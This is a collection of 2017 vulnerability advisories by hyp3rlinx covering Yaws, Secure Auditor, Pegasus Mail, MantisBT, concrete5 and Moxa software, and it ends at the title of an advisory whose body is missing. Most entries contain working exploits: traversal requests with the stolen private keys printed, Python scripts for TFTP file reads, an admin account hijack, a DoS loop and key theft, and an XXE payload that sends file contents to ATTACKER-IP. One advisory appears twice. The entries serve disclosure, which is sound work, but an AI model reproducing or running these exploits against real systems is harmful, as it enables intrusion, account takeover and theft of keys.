CVE-2017-10974 Yaws Web Server v1.91 Unauthenticated Remote File Disclosure
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt [+] ISR: ApparitionSec Vendor: == yaws.hyber.org Product: === Yaws v1.91 (Yet Another Web Server) Yaws is a HTTP high perfomance 1.1 webserver particularly well suited for dynamic-content web applications. Two separate modes of operations are supported: Standalone mode where Yaws runs as a regular webserver daemon. This is the default mode. Embedded mode where Yaws runs as an embedded webserver in another Erlang application. Vulnerability Type: === Unauthenticated Remote File Disclosure CVE Reference: == CVE-2017-10974 Security Issue: Remote attackers who can reach Yaws web server can read the server SSL private key file using directory traversal attacks, access logs are also disclosed etc... this version is somewhat old, however, still avail for download as of the time of this writing. http://yaws.hyber.org/download/ Exploit/POC: = Steal Yaws Server SSL private key ".pem" file. curl http://REMOTE-VICTIM-IP:8080/%5C../ssl/yaws-key.pem -BEGIN RSA PRIVATE KEY- MIICWwIAAAKBgQDMJHAcJXB9TzkYg/ghXNjOAp3zcgKC4XZo4991SPGYukKVU1Fv RX0YgPx3wz8Ae7ykPg0KW7O3D9Pn8liazTYEaXskNKAzOFr1gtBd7p937PKNQk++ 3/As5EfJjz+lBrwUGbSicJgldJk3Cj89htMUqGwL2Bl/yOQIsZtyLlrP1wIDAQAB AoGAYgEwTWLwAUjSaWGs8zJm52g8Ok7Gw+CfNzYG5oCxdBgftR693sSmjOgHzNtQ WMQOyW7eDBYATmdr3VPsk8znHBSfQ19gAJjR89lJ6lt5qDMNtXMUWILn91g+RbkO gmTkhD8uc0e/3FJBwPxFJWQzFEcAR4jNFJwhNzg6CO8CK/ECQQD7sNzvMRnUi1RQ tiKgRxdjdEwNh52OUPwuJWhKdBLIpHBAJxCBHJB+1N0ufpqaEgUfJ5+gEYrBRMJh aTCIJul5AkEAz6MsmkMz6Iej5zlKrlDL5q6GU+wElXK/F1H8tN/JchoSXN8BRCJZ DLpK0mcMN4yukHKDCo0LD9NBlRQFDll/zwJASb2CrW2kVLpRhKgoMu9BMflDwv8G IcqmZ9q72HxzeGd9H76SPlGhIBe7icC8CQHYkE0qnlolXgSIMsP/3RQReQJAYHnt +INvNAUKSB6br6EFDNtcuNO6UYJufbRvmc89d5HbpGFN4k2fWMWajGarC4iHd8Bt WNKuKB09pLoXm1JEiwJAfRtIXE6sr4MQOL6aWwGElw+Yb4B1WBhBiPRRwGTX0nzN HXF3851+kgZBZjjzA3Ib2nr5PeXkZBBLE/4jJvRPRA== -END RSA PRIVATE KEY- --- OR Read the access logs. --- curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access 404 Not Found Not FoundThe requested URL /../logs/localhost.8080.access was not found on this server. Yaws 1.91 Server at localhost:8080 [root@localhost ~]# Then, curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access 127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET / HTTP/1.1" 200 74419 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /stil.css HTTP/1.1" 200 1677 "http://127.0.0.1:8080/; "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_head.gif HTTP/1.1" 200 2308 "http://127.0.0.1:8080/; "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_pb.gif HTTP/1.1" 200 1444 "http://127.0.0.1:8080/; "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_y.gif HTTP/1.1" 200 4831 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:33 -0400] "GET /bindings.yaws HTTP/1.1" 200 5502 "http://127.0.0.1:8080/; "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:42 -0400] "GET /configuration.yaws HTTP/1.1" 200 8634 "http://127.0.0.1:8080/bindings.yaws; "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" etc... Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: June 26, 2017 No replies July 7, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt [+] ISR: ApparitionSec Vendor: www.secure-bytes.com Product: = Secure Auditor - v3.0 Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases and Cisco devices. Vulnerability Type: === Directory Traversal CVE Reference: == CVE-2017-9024 Security Issue: Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname. Exploit/POC: = import sys,socket print 'Secure Auditor v3.0 / Cisco Config Manager' print 'TFTP Directory Traversal Exploit' print 'Read ../../../../Windows/system.ini POC' print 'hyp3rlinx' HOST = raw_input("[IP]> ") FILE = '../../../../Windows/system.ini' PORT = 69 PAYLOAD = "\x00\x01"#TFTP Read PAYLOAD += FILE+"\x00" #Read system.ini using directory traversal PAYLOAD += "netascii\x00" #TFTP Type s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(PAYLOAD, (HOST, PORT)) out = s.recv(1024) s.close() print "Victim Data located on : %s " %(HOST) print out.strip() Network Access: === Remote Severity: = High Disclosure Timeline: == Vendor Notification: May 10, 2017 No replies May 20, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2017-9046 Pegasus "winpm-32.exe" v4.72 Mailto: Link Remote Code Execution
[+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt [+] ISR: APPARITIONSEC Vendor: = www.pmail.com Product: === Pegasus "winpm-32.exe" v4.72 build 572 Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client suitable for use by single or multiple users on single computers or on local area networks. A proven product, it has served millions of users since it was released in 1990. Vulnerability Type: == Remote Code Execution CVE Reference: == CVE-2017-9046 Security Issue: Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by clicking an HTML "mailto:; link if a DLL named "ssgp.dll" exists on the victims Desktop. Tested successfully using Internet Explorer Web Browser. e.g. mailto:n...@victim.com;>Link text Place "ssgp.dll" on the desktop then visit the webpage in "Internet Explorer", click the mailto: link arbitrary code executed and Pegasus (pmail) is then launched. User needs to have setup PMAIL with "mailto:; link option on install. Exploit: 1) Set Pegasus as default Email client for opening Emails, and setup PMAIL with "mailto:; link option on install. 2) Compile "ssgp.dll" as DLL using below 'C' code. #include //gcc -c ssgp.c //gcc -shared -o ssgp.dll ssgp.o BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK); break; } return 0; } 3) Place "ssgp.dll" on Desktop 4) Create an HTML file with following in the web server root directory. mailto:n...@victim.com;>Pegasus Exploit POC 5) Open webpage in InternetExplorer Web Browser and click malicious mailto: link. Our code gets executed... Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: October 8, 2016 Vendor supposedly fixed: January 21, 2016 May 19, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2017-9046 Mantis Bug Tracker 1.3.10 / v2.3.0 CSRF Permalink Injection
[+] Credits: John Page a.k.a hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt [+] ISR: ApparitionSec Vendor: www.mantisbt.org Product: = Mantis Bug Tracker 1.3.10 / v2.3.0 MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases. Vulnerability Type: CSRF Permalink Injection CVE Reference: == CVE-2017-7620 Security Issue: Remote attackers can inject arbitrary permalinks into the mantisbt Web Interface if an authenticated user visits a malicious webpage. Vuln code in "string_api.php" PHP file, under mantis/core/ did not account for supplied backslashes. Line: 270 # Check for URL's pointing to other domains if( 0 == $t_type || empty( $t_matches['script'] ) || 3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) { return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php'; } # Start extracting regex matches $t_script = $t_matches['script']; $t_script_path = $t_matches['path']; Exploit/POC: = http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP; method="POST"> document.forms[0].submit() OR http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0; method="POST"> document.forms[0].submit() Network Access: === Remote Severity: = Medium Disclosure Timeline: = Vendor Notification: April 9, 2017 Vendor Release Fix: May 15, 2017 Vendor Disclosed: May 20, 2017 May 20, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt [+] ISR: ApparitionSec Vendor: www.secure-bytes.com Product: = Secure Auditor - v3.0 Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases and Cisco devices. Vulnerability Type: === Directory Traversal CVE Reference: == CVE-2017-9024 Security Issue: Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname. Exploit/POC: = import sys,socket print 'Secure Auditor v3.0 / Cisco Config Manager' print 'TFTP Directory Traversal Exploit' print 'Read ../../../../Windows/system.ini POC' print 'hyp3rlinx' HOST = raw_input("[IP]> ") FILE = '../../../../Windows/system.ini' PORT = 69 PAYLOAD = "\x00\x01"#TFTP Read PAYLOAD += FILE+"\x00" #Read system.ini using directory traversal PAYLOAD += "netascii\x00" #TFTP Type s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(PAYLOAD, (HOST, PORT)) out = s.recv(1024) s.close() print "Victim Data located on : %s " %(HOST) print out.strip() Network Access: === Remote Severity: = High Disclosure Timeline: == Vendor Notification: May 10, 2017 No replies May 20, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2017-7615 Mantis Bug Tracker v1.3.0 / 2.3.0 Pre-Auth Remote Password Reset
[+] Credits: John Page a.k.a hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt [+] ISR: ApparitionSec Vendor: www.mantisbt.org Product: == Mantis Bug Tracker v1.3.0 / 2.3.0 MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases. Vulnerability Type: === Pre-Auth Remote Password Reset CVE Reference: == CVE-2017-7615 Security Issue: Mantis account verification page 'verify.php' allows resetting ANY user's password. Remote un-authenticated attackers can send HTTP GET requests to Hijack ANY Mantis accounts by guessing the ID / username. Vulnerable code: In verify.php line 66: if( $f_confirm_hash != $t_token_confirm_hash ) { trigger_error( ERROR_LOST_PASSWORD_CONFIRM_HASH_INVALID, ERROR ); } This code attempts to verify a user account and compares hashes for a user request. However, by supplying empty value we easily bypass the security check. e.g. http://127.0.0.1/mantisbt-2.3.0/verify.php?id=1_hash= This will then allow you to change passwords and hijack ANY mantisbt accounts. All version >= 1.3.0 as well as 2.3.0 are affected, 1.2.x versions are not affected. References: https://mantisbt.org/bugs/view.php?id=22690#c56509 POC Video URL: == https://vimeo.com/213144905 Exploit/POC: = import cookielib,urllib,urllib2,time print 'Mantis Bug Tracker >= v1.3.0 - 2.3.0' print '1.2.x versions are not affected' print 'Remote Password Reset 0day Exploit' print 'Credits: John Page a.k.a HYP3RLINX / APPARITIONSEC\n' IP=raw_input("[Mantis Victim IP]>") realname=raw_input("[Username]") verify_user_id=raw_input("[User ID]") passwd=raw_input("[New Password]") TARGET = 'http://'+IP+'/mantisbt-2.3.0/verify.php?id='+verify_user_id+'_hash=' values={} account_update_token='' #verify_user_id='1' #Admin = 1 #realname='administrator'#Must be known or guessed. #REQUEST 1, get Mantis account_update_token cookies = cookielib.CookieJar() opener = urllib2.build_opener( urllib2.HTTPRedirectHandler(), urllib2.HTTPHandler(debuglevel=0), urllib2.HTTPSHandler(debuglevel=0), urllib2.HTTPCookieProcessor(cookies)) res = opener.open(TARGET) arr=res.readlines() for s in arr: if 'account_update_token' in s: break #print s[61:-38] ACCT_TOKEN=s[61:-38] time.sleep(0.3) #REQUEST 2 Hijack the Admin Account TARGET='http://'+IP+'/mantisbt-2.3.0/account_update.php' values = {'verify_user_id' : '1', 'account_update_token' : ACCT_TOKEN, 'realname' : realname, 'password' : passwd, 'password_confirm' : passwd} data = urllib.urlencode(values) opener = urllib2.build_opener( urllib2.HTTPRedirectHandler(), urllib2.HTTPHandler(debuglevel=0), urllib2.HTTPSHandler(debuglevel=0), urllib2.HTTPCookieProcessor(cookies)) response = opener.open(TARGET, data) the_page = response.read() http_headers = response.info() #print http_headers print response.getcode() print 'Account Hijacked!' time.sleep(2) Network Access: === Remote Severity: = Critical Disclosure Timeline: = Vendor Notification: April 7, 2017 Vendor acknowledged: April 7, 2017 Vendor patch created: April 10, 2017 Vendor Disclosure: April 16, 2017 April 16, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
concrete5 v8.1.0 Host Header Injection
[+] Credits: John Page a.k.a hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CONCRETE5-v8.1.0-HOST-HEADER-INJECTION.txt [+] ISR: ApparitionSec Vendor: == www.concrete5.org Product: concrete5 v8.1.0 concrete5 is an open-source content management system (CMS) for publishing content on the World Wide Web and intranets. Vulnerability Type: == Host Header Injection CVE Reference: == CVE-2017-7725 Security Issue: If a user does not specify a "canonical" URL on installation of concrete5, unauthenticated remote attackers can write to the "collectionversionblocksoutputcache" table of the MySQL Database, by making HTTP GET request with a poisoned HOST header. Some affected concrete5 webpages can then potentially render arbitrary links that can point to a malicious website. Example MySQL data from "CollectionVersionBlocksOutputCache" table. (164, 1, 57, 'Header Site Title', 'http://attacker-ip/concrete5-8.1.0/index.php; id="header-site-title">Elemental', 1649861489 e.g. c:\> curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/services -H "Host: attacker-ip" | more Services :: POC var CCM_DISPATCHER_FILENAME = "/concrete5-8.1.0/index.php"; var CCM_CID = 162; var CCM_EDIT_MODE = false; var CCM_ARRANGE_MODE = false; var CCM_IMAGE_PATH = "/concrete5-8.1.0/concrete/images"; var CCM_TOOLS_PATH = "/concrete5-8.1.0/index.php/tools/required"; var CCM_APPLICATION_URL = "<a rel="nofollow" href="http://attacker-ip/concrete5-8.1.0"">http://attacker-ip/concrete5-8.1.0"</a>;; <=== HERE var CCM_REL = "/concrete5-8.1.0"; Exploit: = curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/team/faq -H "Host: attacker-ip" curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/services -H "Host: attacker-ip" curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/portfolio -H "Host: attacker-ip" Navigate to one of these URLs: http://VICTIM-IP/concrete5-8.1.0/index.php/services http://VICTIM-IP/concrete5-8.1.0/index.php/portfolio Click on links in header portion of the webpage from one of the above URLs. Services Portfolio Team / Drop down Menu Blog Contact OR click on the links on footer portion of the webpage. FAQ / Help Case Studies Blog Another Link View on Google Maps Result: user gets redirected to attacker-ip. Network Access: === Remote Severity: = High Disclosure Timeline: == Vendor Notification : April 11, 2017 Vendor reply: "this is a known issue" : April 12, 2017 Requested a CVE from mitre. CVE assigned : April 12, 2017 April 13, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2017-7456 Moxa MXview v2.8 Denial Of Service
[+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-DENIAL-OF-SERVICE.txt [+] ISR: ApparitionSec Vendor: www.moxa.com Product: === MXView v2.8 Download: http://www.moxa.com/product/MXstudio.htm MXview Industrial Network Management Software. Auto discovery of network devices and physical connections Event playback for quick troubleshooting Color-coded VLAN/IGMP groups and other visualized network data Supports MXview ToGo mobile app for remote monitoring and notification—anytime, anywhere. Vulnerability Type: === Denial Of Service CVE Reference: == CVE-2017-7456 Security Issue: Remote attackers can DOS MXView server by sending large string of junk characters for the user ID and password field login credentials. Exploit/POC: = import urllib,urllib2 print 'Moxa MXview v2.8 web interface DOS' print 'hyp3rlinx' IP=raw_input("[Moxa MXView IP]>") PAYLOAD="A"*2 url = 'http://'+IP+'/goform/account' data = urllib.urlencode({'uid' : PAYLOAD, 'pwd' : PAYLOAD, 'action' : 'login'}) while 1: req = urllib2.Request(url, data) res = urllib2.urlopen(req) print res Network Access: === Remote Severity: = Medium Disclosure Timeline: == Vendor Notification: March 5, 2017 Vendor confirms vulnerability : March 21, 2017 Vendor "updated firmware April 7, 2017" : March 29, 2017 April 9, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2017-7455 Moxa MXview v2.8 Remote Private Key Disclosure
[+] Credits: John Page AKA HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-REMOTE-PRIVATE-KEY-DISCLOSURE.txt [+] ISR: APPARITIONSEC Vendor: www.moxa.com Product: === MXview V2.8 Download: http://www.moxa.com/product/MXstudio.htm MXview Industrial Network Management Software. Auto discovery of network devices and physical connections Event playback for quick troubleshooting Color-coded VLAN/IGMP groups and other visualized network data Supports MXview ToGo mobile app for remote monitoring and notification—anytime, anywhere. Vulnerability Type: = Remote Private Key Disclosure CVE Reference: == CVE-2017-7455 Security Issue: MXview stores a copy of its web servers private key under C:\Users\TARGET-USER\AppData\Roaming\moxa\mxview\web\certs\mxview.key. Remote attackers can easily access/read this private key "mxview.key" file by making an HTTP GET request. e.g. curl -v http://VICTIM-IP:81/certs/mxview.key * About to connect() to VICTIM-IP port 81 * Trying VICTIM-IP... connected * Connected to VICTIM-IP (VICTIM-IP) port 81 > GET /certs/mxview.key HTTP/1.1 > User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 > Host: VICTIM-IP:81 > Accept: */* > < HTTP/1.1 200 OK < Date: Tue Feb 28 14:18:00 2017 < Server: GoAhead-Webs < Last-modified: Tue Feb 28 10:46:51 2017 < Content-length: 916 < Content-type: text/plain -BEGIN PRIVATE KEY- MIICdwIBADANBgkqhkiG2w0BAQEFAASCAmEwggJdAgEAAoGBAMO2BjHS6rFYqxPb QCjhVn5+UGwfICfETzk5JQvhkhc71bnsDHI7lVyYhheYLcPQBEglVolwGANPp7LF 2lhG+UaSFfTVk8UDvV0qQpjSQvDjcWSuKBfceyT5zmI8ynxuMHoqBR7ZOSLY31z+ Rxt+JCykwqfMGdjawnC5ivr8iWDpAgMBAAECgYAQpHjwYbQtcpHRtXJGR6s4RHuI RjlQyGPIRPC+iucGbMMm9Ui1qhVwc1Pry7gQj67dh7dNJqgUGAD1tdd0bEykKoqm ICgXj0HMPCLxUy4CHIZInsBhzAyp/3atkDIaeELZckCbmttkVvncDi+b9HnuL/To YwJpuLkpXEKpjK7iAQJBAOof+yliPn7UsBecw/Hc/ixeDRGI1kjtvuOvSi6jLZoj 3rzODMSD1eRcrK/GJydWVT8TV3WXXYn3M1cu3kmQJKkCQQDV/zlBtFFPPVAl1zy7 UBG+RPI63uXeaA0C1+RX2XfJSR4zeKxnWgalzUl0UwMgWB3Gpp2+VW5a/zw3aKlK 6MJBAkBHPMXqWKdVZhfSh3Ojky+PhmqJjE5PUG/FzZ9Pw3zrqsBqSHPgE5Ewc/Zj YXKmavCbSaJR+GWQxjPL8knWrlJJAkEAkahnEJHrxkO1igw3Ckg0y4yiU+/kBr5M HONWSXV8U0WxiNdagf6FB9XzaXoXZuyTl+NQ+3yq4MVZ910F3jcQAQJBAI+q0AcX EskHai2Fx24gkHwwRxacsiXrRClxIj5NB52CSo2Sy6EF02DKQVWR3oIjDesXcWvl +CPTV6agBkYxe7Q= -END PRIVATE KEY- Exploit: = import socket print 'Moxa MXview 2.8 Remote Private Key Theft' print 'by hyp3rlinx\n' IP=raw_input("[Moxa MXview IP]> ") PORT=int(raw_input("[PORT]> ")) STEAL_PRV_KEY="GET /certs/mxview.key HTTP/1.1\r\nHost: "+IP+"\r\n\r\n" s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((IP,PORT)) s.send(STEAL_PRV_KEY) print 'Enjoy ur private server key!\n' print s.recv(512) s.close() Network Access: === Remote Severity: = Critical Disclosure Timeline: === Vendor Notification: March 5, 2017 Vendor confirms vulnerability : March 21, 2017 Vendor "updated firmware April 7, 2017" : March 29, 2017 April 9, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). HYP3RLINX
CVE-2017-7457 Moxa MX AOPC-Server v1.5 XML External Entity Injection
[+] Credits: John Page AKA HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MX-AOPC-SERVER-v1.5-XML-EXTERNAL-ENTITY.txt [+] ISR: ApparitionSec Vendor: www.moxa.com Product: === MX-AOPC UA SERVER - 1.5 Moxa's MX-AOPC UA Suite is the first OPC UA server for industrial automation supporting both push and pull communication. Vulnerability Type: == XML External Entity Injection CVE Reference: == CVE-2017-7457 Security Issue: XML External Entity via ".AOP" files used by MX-AOPC Server result in remote file disclosure. If local user opens a specially crafted malicious MX-AOPC Server file type. Exploit/POC: = run MX-AOPC UA Server / Runtime / Start Server Runtime Service a) ATTACKER SERVER LISTENER we will access Windows msfmap.ini as proof of concept python -m SimpleHTTPServer 8080 "Evil.AOP" file http://ATTACKER-IP:8080/payload.dtd;> %dtd;]> b) Evil "payload.dtd" file host on ATTACKER SERVER http://ATTACKER-IP:8080?%file;'>"> %all; e.g. python -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ... VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /payload.dtd HTTP/1.1" 200 - VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /?;[connect%20name]%20will%20modify%20the%20connection%20if%20ADC.connect="name";[connect%20default]%20will%20modify%20the%20connection%20if%20name%20is%20not%20found;[sql%20name]%20will%20modify%20the%20Sql%20if%20ADC.sql="name(args)";[sql%20default]%20will%20modify%20the%20Sql%20if%20name%20is%20not%20found;Override%20strings:%20Connect,%20UserId,%20Password,%20Sql.;Only%20the%20Sql%20strings%20support%20parameters%20using%20"?";The%20override%20strings%20must%20not%20equal%20""%20or%20they%20are%20ignored;A%20Sql%20entry%20must%20exist%20in%20each%20sql%20section%20or%20the%20section%20is%20ignored;An%20Access%20entry%20must%20exist%20in%20each%20connect%20section%20or%20the%20section%20is%20ignored;Access=NoAccess;Access=ReadOnly;Access=ReadWrite;[userlist%20name]%20allows%20specific%20users%20to%20have%20special%20access;The%20Access%20is%20computed%20as%20follows:;%20%20(1)%20First%20take%20the%20access%20of%20the%20connect%20se ction.;%20%20(2)%20If%20a%20user%20entry%20is%20found,%20it%20will%20override.[connect%20default];If%20we%20want%20to%20disable%20unknown%20connect%20values,%20we%20set%20Access%20to%20NoAccessAccess=NoAccess[sql%20default];If%20we%20want%20to%20disable%20unknown%20sql%20values,%20we%20set%20Sql%20to%20an%20invalid%20query.Sql="%20"[connect%20CustomerDatabase]Access=ReadWriteConnect="DSN=AdvWorks"[sql%20CustomerById]Sql="SELECT%20*%20FROM%20Customers%20WHERE%20CustomerID%20=%20?"[connect%20AuthorDatabase]Access=ReadOnlyConnect="DSN=MyLibraryInfo;UID=MyUserID;PWD=MyPassword"[userlist%20AuthorDatabase]Administrator=ReadWrite[sql%20AuthorById]Sql="SELECT%20*%20FROM%20Authors%20WHERE%20au_id%20=%20?" HTTP/1.1" 200 - Network Access: === Remote Severity: = High Disclosure Timeline: == Vendor Notification: March 5, 2017 Vendor confirms vulnerability : March 21, 2017 Vendor "updated firmware April 7, 2017" : March 29, 2017 April 9, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Spiceworks 7.5 TFTP Improper Access Control File Overwrite / Upload
